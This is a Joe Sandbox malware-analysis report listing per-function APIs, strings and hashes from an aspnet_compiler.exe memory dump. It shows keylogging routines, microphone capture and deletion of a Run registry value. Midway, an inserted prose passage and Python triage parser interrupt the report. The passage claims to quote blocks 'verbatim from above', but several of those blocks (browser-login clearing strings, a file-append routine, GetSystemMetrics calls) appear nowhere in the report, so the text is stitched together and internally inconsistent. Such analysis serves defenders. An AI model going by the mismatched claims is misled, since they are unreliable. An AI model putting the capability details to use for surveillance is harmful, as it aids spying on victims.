                                                          • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                          • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                          • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                          • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: >G
                                                          • API String ID: 180926312-1296849874
                                                          • Opcode ID: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                          • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                          • Opcode Fuzzy Hash: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                          • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                          APIs
                                                          • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: $fD
                                                          • API String ID: 1807457897-3092946448
                                                          • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                          • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                          • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                          • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                          APIs
                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ACP$OCP
                                                          • API String ID: 0-711371036
                                                          • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                          • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                          • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                          • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 481472006-1507639952
                                                          • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                          • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                          • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                          • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: | $%02i:%02i:%02i:%03i
                                                          • API String ID: 481472006-2430845779
                                                          • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                          • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                          • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                          • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: alarm.wav$xIG
                                                          • API String ID: 1174141254-4080756945
                                                          • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                          • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                          • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                          • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                          • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                          • String ID: Online Keylogger Stopped
                                                          • API String ID: 1623830855-1496645233
                                                          • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                          • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                          • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                          • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
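The per-function blocks above (APIs, Strings, Memory Dump Source, Similarity, each closed by an Instruction Fuzzy Hash line) are what an analyst pivots on when comparing this aspnet_compiler.exe memory dump against other Remcos samples. The following added example, written for this page and not part of the Joe Sandbox report or its tooling, parses that block layout into records and tags functions with a capability hint: the "Cleared browsers logins and cookies." strings, the CreateFileW/SetFilePointer(FILE_END)/WriteFile log-append routine, and the UnhookWindowsHookEx "Online Keylogger Stopped" routine are taken verbatim from the blocks above as constructed input. The tagging rules and tag names are this example's own assumptions, not sandbox signatures.

```python
"""Parse Joe Sandbox per-function metadata blocks (the layout used above: APIs, Strings,
Memory Dump Source, Similarity, ending at the Instruction Fuzzy Hash) and tag each function
with the capability its APIs and strings suggest. Added triage helper, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
                    r"(?P<api>[\w:@?$]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?"
                    r"\s*ref:\s*(?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^•\s+(?P<s>.*), xrefs:\s*(?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s+(?P<k>[^:]+):\s*(?P<v>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}

@dataclass
class Func:
    apis: list = field(default_factory=list)     # (api, module, args, ref, subcall_of)
    strings: list = field(default_factory=list)  # (string, xref)
    meta: dict = field(default_factory=dict)     # "API ID", "Opcode ID", ...

def parse(text):
    """Split report text into Func records; a block ends at its Instruction Fuzzy Hash."""
    funcs, cur, section = [], Func(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append((m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = STR_RE.match(line) if section == "Strings" else None
        if m:
            cur.strings.append((m["s"], m["ref"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m["k"]] = m["v"]
            if m["k"] == "Instruction Fuzzy Hash":
                funcs.append(cur)
                cur = Func()
    return funcs

def tag(f):
    """Heuristic capability labels; the rules are this example's assumptions, not sandbox signatures."""
    names = {a[0] for a in f.apis}
    text = " ".join(s for s, _ in f.strings) + " " + f.meta.get("String ID", "")
    tags = set()
    if names & {"SetWindowsHookExW", "SetWindowsHookExA", "UnhookWindowsHookEx"} or "Keylogger" in text:
        tags.add("keylogger")
    if "browsers logins" in text:
        tags.add("browser_credential_wipe")
    if names >= {"CreateFileW", "WriteFile"}:
        tags.add("file_write")
    # SetFilePointer(h, 0, NULL, FILE_END=2) followed by WriteFile: log-style append
    if "WriteFile" in names and any(a == "SetFilePointer" and args[3:4] == ["00000002"]
                                   for a, _, args, _, _ in f.apis):
        tags.add("file_append")
    return tags

def triage(text):
    """Opcode ID prefix (a pivot key across samples) -> sorted tags, one entry per function."""
    return {f.meta.get("Opcode ID", "?")[:12]: sorted(tag(f)) for f in parse(text)}

# Constructed sample: three blocks copied from the report above, with the Instruction ID,
# Opcode Fuzzy Hash, memory-dump and plugin lines dropped for brevity.
SAMPLE = """\
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
• Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
• Instruction Fuzzy Hash: 7001F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
• Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
"""
```

Calling triage(SAMPLE) yields one entry per function keyed by the first 12 characters of its Opcode ID, which is the value worth carrying into a notebook or case file: the same Opcode ID or Instruction Fuzzy Hash turning up in another sample's dump is a stronger link than a shared API name. The argument values the sandbox records are stack snapshots and are only reliable for constants the code pushes directly (the FILE_END move method here, or the GetSystemMetrics indices 0x4C-0x4F for the virtual-screen bounds in the block further up), so keep argument-based rules to those positions.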
                                                          APIs
                                                          • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                          • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferHeaderPrepare
                                                          • String ID: T=G
                                                          • API String ID: 2315374483-379896819
                                                          • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                          • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                          • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                          • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                          APIs
                                                          • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocaleValid
                                                          • String ID: IsValidLocaleName$j=D
                                                          • API String ID: 1901932003-3128777819
                                                          • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                          • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                          • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                          • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: T=G$T=G
                                                          • API String ID: 3519838083-3732185208
                                                          • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                          • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                          • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                          • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                            • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                            • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                            • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                            • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                            • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                          • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                          • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                          • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                          APIs
                                                          • _free.LIBCMT ref: 00448825
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast_free
                                                          • String ID: `@$`@
                                                          • API String ID: 1353095263-20545824
                                                          • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                          • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                          • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                          • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                          • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                          • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                          • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                          • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                          • GetLastError.KERNEL32 ref: 0043FB02
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                          • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                          • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                          • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759